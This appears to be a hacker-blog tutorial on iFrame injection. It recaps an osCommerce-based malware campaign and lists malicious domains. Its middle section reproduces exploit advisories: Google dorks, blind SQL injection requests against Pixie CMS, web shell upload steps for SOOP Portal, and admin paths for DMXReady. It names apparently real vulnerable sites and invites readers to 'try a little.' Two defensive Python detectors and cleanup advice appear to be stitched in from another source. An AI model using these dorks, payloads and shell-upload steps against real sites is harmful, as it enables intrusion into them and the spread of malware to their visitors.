
The recently discovered iFrame injection campaign rages on, as the number of compromised web pages goes from 90,000+ to over three million.

Armorize researchers have been keeping an eye on the unfolding situation and point out that the attackers are taking advantage of a number of vulnerabilities in the open-source e-commerce solution osCommerce.

The injected iFrames point to the willysy.com and exero.eu domains and, through a series of redirections and JavaScript loadings of additional iFrames, take the user to a page on the arhyv.ru domain, where a number of exploits try to take advantage of a handful of vulnerabilities in the user's browser.




So guys, what is iFrame injection?
Let's start....




Iframe injection is redirection to a malware-hosting site by means of an iframe tag. The attacker injects links to the malware-hosting website into popular websites, using cross-site scripting. When the usual visitors of that popular site open it, they are redirected to the malware-hosting website, and the malware is loaded onto their computer.
Nowadays internet hoppers run into this while browsing absent-mindedly; they do not know that their system has been infected with some malware, virus, trojan, worm, etc....


(A practical experience of mine:
sometimes when I download some private "black tool" from a forum, it says that you have to download a downloader and then it will automatically download your desired file.
I downloaded some file like that, but after downloading I analysed that program, the downloader; it contained a trojan that opens some ports to build a way for the attacker to compromise your system. But thanks to my AV :P)


But nowadays our browsers are too smart; they will not pop up to auto-download a program (but be careful about your downloader, e.g. IDM, DAP, etc.).


What is the <iframe> tag?
The <iframe> tag is an HTML tag used to seamlessly embed content from another page or site in order to build online applications.
Here 'i' refers to invisible, i.e. <iframe> is an "invisible frame". (Strictly, the HTML specification expands the 'i' as "inline", but injected frames are almost always styled so that the visitor cannot see them, which is why the nickname fits.)








We started with an intro to iframe injection; now, what does an attacker do with this attack, and why?
As you guys are aware, nowadays CC (credit card) fraud is the fashion of every hacker :P
The attackers' main target is some online shopping site, and they get CC info with that, as we discussed at first with the willysy incident.
The initial malicious destination URL in the willysy infection chain has been changed because it has since been blocked. It is now the same as that for the exero one: musicyo.ru/d.php?[REMOVED].
Detection of this attack is very low (11.6%) on VirusTotal.

So we know something about iframe injection, but how is the attack performed?
So let's begin......
Black side of iframe injection
First of all, the attacker has to find some vulnerable site using Google dorks.
Here I will give you some examples with dorks..
AngelParrot/i4Style Web Design SQL Injection/ Cross Site
Scripting
Paulo Santos/CGI Helper 1.00 Cross Site Scripting

Piranha/Pixie CMS 1.01 - 1.04 Blind SQL Injection
Exploit Title: Pixie CMS 1.01 - 1.04 "pixie_user" Blind SQL
Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha, piranha[at]torontomail.com
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET
http://localhost:8080/pixie_v1.04/?pixie_user=x',log_important=IF({CONDITION},SLEEP(5),NULL),log_id='1234
Host: localhost:8080
Referer: http://www.google.com/
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with
timeout ~5 seconds. Notice that referer is required.

Exploit Title: Pixie CMS 1.01 - 1.04 "Referer" Blind SQL
Injection
Google Dork: None
Date: 11/14/2011
Author: Piranha
Software Link: http://www.getpixie.co.uk/
Version: 1.01 - 1.04
Tested on: Windows XP SP3, Pixie versions: 1.01 - 1.04
CVE : None

Example request:
GET http://localhost:8080/pixie_v1.04/
Host: localhost:8080
Referer: http://www.google.com',log_important=IF({CONDITION},SLEEP(5),NULL),log_id='1234
Pragma: no-cache
Cache-Control: no-cache
Connection: Keep-Alive

If the condition is true then you have a response with
timeout ~5 seconds.

Sun Army/SOOP Portal Raven 1.0b Shell Upload Vulnerability
# Exploit Title: SOOP Portal Raven 1.0b Remote Upload Shell Vulnerability
# Google Dork: "Powered by SOOP Portal Raven 1.0b"
# Date: 06-12-2010
# Author: Sun Army
# Version: Raven 1.0b
# Tested on: Win 2003

nGa Sa Lu/MG for Media Solution
===============================================================
# Exploit Title : MG for media solutions SQL inj: vulnerable
# Google Dork : intext:"Powered by MG for media solutions
# Date : 27-10-2011
# Author : nGa Sa Lu [ GaNgst3r ]
# Service Provider : http://www.mg-me.com/ourservices
# Tested on : Vista
# Platform : php
===============================================================

[+] Google Dork : intext:"Powered by MG for media solutions

[+] SQL Error Statement :
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right
syntax to use near ''1''' at line 1

[+] Demo :
http://www.apex-sy.com/index.php?inid=4&amp;pid=[SQL]
http://hekmahospital.com/index.php?inid=1&amp;id=[SQL]
MG for media solutions suffers from a remote SQL Injection
Vulnerability

nGa Sa Lu/Debliteck Ltd SQL Injection
===============================================================
# Exploit Title : Debliteck Ltd SQL inj: vulnerable
# Google Dork : "Designed and Developed by Debliteck Ltd"
# Date : 17-11-2011
# Author : nGa Sa Lu [ GaNgst3r ]
# Service Provider : http://www.debliteck.com/main.php
# Tested on : Vista
# Platform : php
===============================================================

[+] Google Dork :
"Designed and Developed by Debliteck Ltd"

[+] SQL Error Statement :
Warning: mysql_num_rows(): supplied argument is not a
valid MySQL result resource in
/home/l/i/limelight/public_html/article.php on line 19
Wrong article id 66\'at line 1

[+] http://www.localhost.com/article.php?id=[SQL]

[+] Demo :
http://www.limelighttaverna.com/article.php?id=66 [SQL]
http://www.tuckinncy.com/article.php?id=88 [SQL]


##################### Exploit ###################
#
# 1.Register On Site
#
# 2.Shell Renamed to .asp.jpg ( shell.asp.jpg )
#
# 3.Go This Page --> http://site/forum/register.asp?fpn=2
#
# 4. Brows And Upload SHell
#
# 5. go http://site/forum/register.asp?fpn=2 --> List
Avatars --> Your
Personal
# Avatar --> select your Shell and View shell Address
in text box
#
#
# Google Dork : ""Powered by SOOP Portal Raven 1.0b"
#

ajann/DMXReady Document Library Manager <= 1.1 Contents Change Vulnerability
*******************************************************************************
# Title : DMXReady Document Library Manager <= 1.1 Remote Contents Change Vulnerability
# Author : "ajann" from Turkey
# Contact : :(
# S.Page : http://www.dmxready.com
# $$ : 39.97 $
# Dork : inurl:inc_documentlibrarymanager.asp
# DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_documentlibrarymanager.asp&btnG=Google%27da+Ara&meta=
*******************************************************************************

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

# http://[target]/[path]/admin/DocumentLibraryManager/add_category.asp

Example:
You Find -> http://[target]/[path]//applications/DocumentLibraryManager/inc_documentlibrarymanager.asp
Edit -> http://[target]/[path]//admin/DocumentLibraryManager/add_category.asp

So guys, with these examples you can try a little.. :P
But be careful about ..??
These exploits have been updated; you can check them using Google.
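The defender's counterpart to the Pixie CMS advisories above: the delay payload travels either in the query string or in the Referer header, so a log check has to URL-decode and inspect both fields, not just the request line. This is an added example, not code from the advisories or from this post; the combined-format log lines are constructed to mirror the two Pixie requests quoted above, and the client addresses and timestamps are made up.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Delay primitives used by time-based blind SQL injection (MySQL, MSSQL, PostgreSQL).
# The "(" is required so ordinary words such as "sleep-tips" in a URL are not flagged.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)


def scan_line(line):
    """Return a finding dict if the request line or the Referer carries a delay payload."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not combined format; the caller can count these separately
    hit_fields = []
    for field in ("request", "referer"):
        decoded = unquote_plus(m.group(field))  # payloads are usually URL-encoded
        if DELAY_RE.search(decoded):
            hit_fields.append(field)
    if not hit_fields:
        return None
    return {"host": m.group("host"), "time": m.group("time"), "fields": hit_fields}


def scan_log(lines):
    """Scan an iterable of log lines and return every finding in order."""
    return [f for f in (scan_line(line) for line in lines) if f]


# Constructed log lines mirroring the two Pixie CMS requests quoted above: the
# first carries the payload in the query string, the second in the Referer header.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Nov/2011:10:01:02 +0000] "GET /pixie_v1.04/?pixie_user=x%27,log_important=IF({CONDITION},SLEEP(5),NULL),log_id=%271234 HTTP/1.1" 200 512 "http://www.google.com/" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Nov/2011:10:01:09 +0000] "GET /pixie_v1.04/ HTTP/1.1" 200 512 "http://www.google.com\',log_important=IF({CONDITION},SLEEP(5),NULL),log_id=\'1234" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Nov/2011:10:02:00 +0000] "GET /index.php?page=sleep-tips HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A pattern match alone says a probe was attempted, not that it worked; pair it with the response-time field of your log format to confirm the ~5 second delay the advisory describes.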

So fellas, we have been talking about the attack, but we have to take care of ourselves with a cure...
What should we do if we are infected via iframe injection?
Most of us use FileZilla/XAMPP to host a local site and connect to the FTP server, so we must change our passwords for FTP, the control panel and the database.
Changing passwords alone does not remove the injected code: the iframe has to be removed from every affected file, and the hole the attackers came in through (in the willysy case, the osCommerce vulnerabilities mentioned above) has to be patched, or the frame will simply come back.
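Before rotating passwords you need to know which files carry the injected frame. The following is an added example, not code from this post: it scans an HTML document for iframes that are zero-size, CSS-hidden or pointing off-site, the hallmarks of the injection described above. The sample page and the TRUSTED_HOSTS set are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts that legitimately serve frames for this site (constructed sample values).
TRUSTED_HOSTS = {"shop.example", "www.shop.example"}

# CSS tricks used to keep an injected frame off-screen or invisible.
HIDDEN_CSS = re.compile(r"display:none|visibility:hidden|(?:left|top):-\d")


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def classify_iframe(attrs, trusted_hosts=TRUSTED_HOSTS):
    """Flag a frame that is hidden (zero-size or CSS-hidden) or points off-site."""
    src = attrs.get("src", "")
    host = (urlparse(src).hostname or "").lower()
    style = attrs.get("style", "").replace(" ", "").lower()
    zero_size = all(attrs.get(d, "").strip("px ") in ("0", "1") for d in ("width", "height"))
    hidden = zero_size or bool(HIDDEN_CSS.search(style))
    external = bool(host) and host not in trusted_hosts
    return {"src": src, "host": host, "hidden": hidden, "external": external}


def suspicious_iframes(html, trusted_hosts=TRUSTED_HOSTS):
    """Return every iframe in the HTML that is hidden or external (or both)."""
    collector = IframeCollector()
    collector.feed(html)
    results = [classify_iframe(a, trusted_hosts) for a in collector.iframes]
    return [r for r in results if r["hidden"] or r["external"]]


# Constructed page: one legitimate frame, one injected frame of the kind seen in
# the willysy campaign (0x0, hidden, off-site), and one same-site frame pushed off-screen.
SAMPLE_HTML = """<html><body><h1>Welcome to our shop</h1>
<iframe src="https://www.shop.example/cart" width="400" height="300"></iframe>
<iframe src="http://malicious.invalid/in.php" width="0" height="0" style="visibility: hidden"></iframe>
<iframe src="/help" style="position:absolute; left:-9999px"></iframe>
</body></html>"""
```

Run suspicious_iframes() over every .php/.html file in the web root (and over the rendered pages, since the injection may also live in the database) and treat any hidden external frame as a confirmed compromise.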
